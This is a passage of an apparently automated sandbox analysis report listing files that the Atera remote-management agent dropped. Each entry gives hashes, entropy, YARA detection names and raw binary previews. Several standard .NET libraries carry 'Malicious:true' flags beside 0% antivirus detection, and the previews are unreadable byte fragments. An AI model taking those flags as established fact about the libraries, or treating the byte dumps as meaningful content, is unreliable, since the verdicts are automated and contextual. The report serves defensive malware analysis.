                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                                                                                                                  MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                                                                                                                  SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......^....`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                                                                                                                  MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                                                                                                                  SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                                                                                                                  SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                                                                                                                  SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                                                                                                                  MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                                                                                                                  SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                                                                                                                  SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......5.....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                                                                                                                  MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                                                                                                                  SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                                                                                                                  MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                                                                                                                  SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                                                                                                                  SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                                                                                                                  SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):97328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                                                                                                                  MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                                                                                                                  SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................d.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                                                                                                                  MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                                                                                                                  SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                                                                                                                  SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`...........@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Nh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB7f5DxmX:Ny9eEpYinAMxCA7xDxmX
                                                                                                                                                                                                                                                                                                                                  MD5:2BBEC1A6C6C64499CE0A4EDEA5D0C629
                                                                                                                                                                                                                                                                                                                                  SHA1:A1C39059B887B7A1BDF93CAB3237413D5948BE26
                                                                                                                                                                                                                                                                                                                                  SHA-256:D80E6D1C2A0850A2FDCA5F16A259130B08DDFE968CDC137253221CD4600D53CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:B27639E9D30FD23461723708D4067C99AA3162FD8EF935AD5DA75776EBB46F2D11BD0FCA211BE35A195CE3020E10E063F66FDDDEAC0624392143B856DC23C174
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................q.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):384543
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999457129580227
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:QCkHWMIRwZL7gsOTLQezyUyt6ywEYUxa5FDW8mWalWh6Nxjuq0xn57/EMpx4Ip7/:x4j1ZXgsO3dU61Oa3a8O50VF/R7pwvgZ
                                                                                                                                                                                                                                                                                                                                  MD5:3C93B399B417B0D6A232D386E65A8B46
                                                                                                                                                                                                                                                                                                                                  SHA1:BB26DEAE135F405229D6F76EB6FAAEB9A3C45624
                                                                                                                                                                                                                                                                                                                                  SHA-256:29BC4577588116CBFEA928B2587DB3D0D26254163095E7FBBCDE6E86FD0022D7
                                                                                                                                                                                                                                                                                                                                  SHA-512:A963F5CF2221436938F031B65079BEA7C4BAFBD48833A9E11CD9BDD1548D68ED968D9279299AA2ADFC23311A6744D516CC50E6537AA45321E5653755ED56F149
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....qF=Y..t.........=...AgentPackageAgentInformation/AgentPackageAgentInformation.exe....0...................$A...?..K.*...{K...>3..y..m..7.|.....l4._.>.G..............}.p.........@....q...2T_.1^|..;.V.(V.:...F|.{.oX.......>....8.]QK.r]3}..h....l.d.z......WI..dG.d..{>.CM.....9/j..a....f.qF...X.}a.t........%n.+..I..-Xa..7..d.D..0...L.K....i"..Z.....~.~....._..{p*......+v,.K..F.X.|;"..!d......So'.f.o.......^.A.........c......|315....o.oRU..#.....R..h..[.":i..+8}...E:..!.M...Th%O;.dX.qK2.....9TD...Nt.J...."..$..k..k.'&I.p ...h.d......Z.3~...]~.B...}...~.(:U....=r<)...,...+.$...i=...1I.]....4Z..'...&..R......R.sW.?../.k....USg........o.....[......U......e..V...jG.Y.....v2...ph.L..3..n.!..... ..W."...cJ./.`..Lr..l.b..'.N^@....,D.y.....i._....@....M..)u-C.R..3"....C.iV/..|..c....$_..Uj.....^.R...*5......O........6*qw..G5.+.\.1..... .X...f..H._S.....b..HY>.GJ..}.,Fj...*.!...,(.j!.Od...&.....`.[.y.1*...$...a.8.j#9.Q...y..E.S.rQ*.2O.;.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):177712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.81549541154566
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fDpvOyLSson7aezB53Pbsk4GJCMA1TSuAehsZ7f2lz8/ChoCby:fD4y07asBx4krGSeCZXH
                                                                                                                                                                                                                                                                                                                                  MD5:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  SHA1:F135BE75C721AF2D5291CB463CBC22A32467084A
                                                                                                                                                                                                                                                                                                                                  SHA-256:36704967877E4117405BDE5EC30BEAF31E7492166714F3FFB2CEB262BF2FB571
                                                                                                                                                                                                                                                                                                                                  SHA-512:BD654388202CB5090C860A7229950B1184620746F4C584AB864EADE831168BC7FAE0B5E59B90165B1A9E4BA2BD154F235749718AE2DF35D3DD10403092185ED1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0................. ........@.. ....................................`.....................................O.......................0(..........X................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H...................,....................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o .....s!...%.o".......o#.....s$..........s%...%......io&...%o'.....o(.......o)...o).....(*...*..0..........r...p... .....r...p.(.....o......(.....o.......(+..........s......[o .....s!...%.o".......o,.......s-..........s%......i.l.....%......io........o)...o)...(.........o/...*..(0...*..{....*"..}....*..{....*"..}....*..{.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):546
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                                                                  MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                                                                                                                  SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                                                                                                                  SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhWRn:WY
                                                                                                                                                                                                                                                                                                                                  MD5:DC63026E80D2BB04F71E41916F807E33
                                                                                                                                                                                                                                                                                                                                  SHA1:6CDA386D2C365F94EA3DE41E2390FD916622EB51
                                                                                                                                                                                                                                                                                                                                  SHA-256:3B54D00F00AA80384DE88E4F4005E9D4D889A2CCF64B56E0C29D274352495C85
                                                                                                                                                                                                                                                                                                                                  SHA-512:61DA550EFD55187978872F5D8E88164A6181A11C8A720684EAA737E0846FE20B9E82B73E1F689A6585834B84C4CEE8DD949AF43E76FD0158F6CAFA704AB25183
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=37.9

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.180547422449922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:vJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxw0h:vQUm2H5KTfOLgxFJjE50vksVUfPvC1h
                                                                                                                                                                                                                                                                                                                                  MD5:9D8B5941EA5B905E8197A175EF2B15A9
